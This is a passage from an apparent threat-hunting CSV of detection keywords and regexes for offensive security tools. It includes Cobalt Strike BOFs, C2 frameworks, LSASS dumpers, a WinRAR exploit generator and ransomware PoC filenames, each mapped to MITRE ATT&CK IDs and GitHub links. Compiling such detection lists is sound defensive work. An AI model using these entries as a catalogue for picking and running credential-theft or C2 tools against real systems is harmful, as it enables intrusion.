SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rajkumardusad/onex*",".{0,1000}rajkumardusad\/onex.{0,1000}","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rajkumardusad/Tool-X*",".{0,1000}rajkumardusad\/Tool\-X.{0,1000}","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. 
Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/Tool-X","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*RalfHacker/Kerbeus-BOF*",".{0,1000}RalfHacker\/Kerbeus\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*RalphDesmangles/22f580655f479f189c1de9e7720776f1*",".{0,1000}RalphDesmangles\/22f580655f479f189c1de9e7720776f1.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0003 - TA0004","N/A","N/A","Lateral Movement - 
Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","1","N/A","8","8","N/A","N/A","N/A","N/A" "*RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD*",".{0,1000}RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*random_c2_profile*",".{0,1000}random_c2_profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" 
"*random_c2profile.*",".{0,1000}random_c2profile\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*random_user_agent.params*",".{0,1000}random_user_agent\.params.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*random_user_agent.user_agent*",".{0,1000}random_user_agent\.user_agent.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*randomalice1986@*",".{0,1000}randomalice1986\@.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain 
name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","email user name","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "*-RandomAttackPath -Token*",".{0,1000}\-RandomAttackPath\s\-Token.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*randombob1986@*",".{0,1000}randombob1986\@.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","email user name","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "*randomize_sw2_seed.py*",".{0,1000}randomize_sw2_seed\.py.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*Ransom:Win32/Sodinokibi*",".{0,1000}Ransom\:Win32\/Sodinokibi.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*Ransomware POC tool that encrypts a given directory*",".{0,1000}Ransomware\sPOC\stool\sthat\sencrypts\sa\sgiven\sdirectory.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*Ransomware.dll*",".{0,1000}Ransomware\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*Ransomware.pdb*",".{0,1000}Ransomware\.pdb.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" 
"*ransomware_config.py*",".{0,1000}ransomware_config\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*ransomware_payload.py*",".{0,1000}ransomware_payload\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*Ransomware-E20F7CED-42AD-485E-BE4D-DE21DCE58EC0.json*",".{0,1000}Ransomware\-E20F7CED\-42AD\-485E\-BE4D\-DE21DCE58EC0\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*RansomwarePoc.cpp*",".{0,1000}RansomwarePoc\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*RansomwarePoc.exe*",".{0,1000}RansomwarePoc\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" 
"*RansomwarePoc\RansomwarePoc*",".{0,1000}RansomwarePoc\\RansomwarePoc.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*Rapid7*",".{0,1000}Rapid7.{0,1000}","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.rapid7.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rapid7.github.io/metasploit-framework/api/*",".{0,1000}rapid7\.github\.io\/metasploit\-framework\/api\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Rar a -v3g -k -r -s -m3 *",".{0,1000}Rar\sa\s\-v3g\s\-k\s\-r\s\-s\s\-m3\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation 
tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rar2john *",".{0,1000}rar2john\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*rar2john.*",".{0,1000}rar2john\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*rarce *.pdf *.rar*",".{0,1000}rarce\s.{0,1000}\.pdf\s.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*rarce *.rar*",".{0,1000}rarce\s.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*rarce-1.0.0.tar.gz*",".{0,1000}rarce\-1\.0\.0\.tar\.gz.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for 
CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*rarce-1.0.0-py3-none-any.whl*",".{0,1000}rarce\-1\.0\.0\-py3\-none\-any\.whl.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*rasman*whoami*",".{0,1000}rasman.{0,1000}whoami.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*RasMan.vcxproj*",".{0,1000}RasMan\.vcxproj.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*rasman_c.c*",".{0,1000}rasman_c\.c.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*rasman_h.h*",".{0,1000}rasman_h\.h.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 
","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*RasmanPotato-master*",".{0,1000}RasmanPotato\-master.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*rasta-mouse*",".{0,1000}rasta\-mouse.{0,1000}","offensive_tool_keyword","Github Username","github user author of various offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/rasta-mouse","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rastamouse.me/dumping-lsass-with-duplicated-handles*",".{0,1000}rastamouse\.me\/dumping\-lsass\-with\-duplicated\-handles.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*rasta-mouse/PPEnum*",".{0,1000}rasta\-mouse\/PPEnum.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","96","8","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" "*rasta-mouse/RuralBishop*",".{0,1000}rasta\-mouse\/RuralBishop.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*rasta-mouse/SharpC2*",".{0,1000}rasta\-mouse\/SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*rasta-mouse/ThreatCheck*",".{0,1000}rasta\-mouse\/ThreatCheck.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*rasta-mouse/TikiTorch*",".{0,1000}rasta\-mouse\/TikiTorch.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*rat communications are NOT SECURE. 
Do not send sensitive info through the C2 channel unless using SSL*",".{0,1000}rat\scommunications\sare\sNOT\sSECURE\.\sDo\snot\ssend\ssensitive\sinfo\sthrough\sthe\sC2\schannel\sunless\susing\sSSL.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*ratchatPT*/bin/bash*",".{0,1000}ratchatPT.{0,1000}\/bin\/bash.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*RatChatPT.exe*",".{0,1000}RatChatPT\.exe.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*RatChatPT.exe*",".{0,1000}RatChatPT\.exe.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*RatChatPT_windows.exe*",".{0,1000}RatChatPT_windows\.exe.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*RatChatPT_windows.exe*",".{0,1000}RatChatPT_windows\.exe.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*ratchatpt-main*",".{0,1000}ratchatpt\-main.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*ratchatpt-main*",".{0,1000}ratchatpt\-main.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*raw*/straight-shooter.c*",".{0,1000}raw.{0,1000}\/straight\-shooter\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege 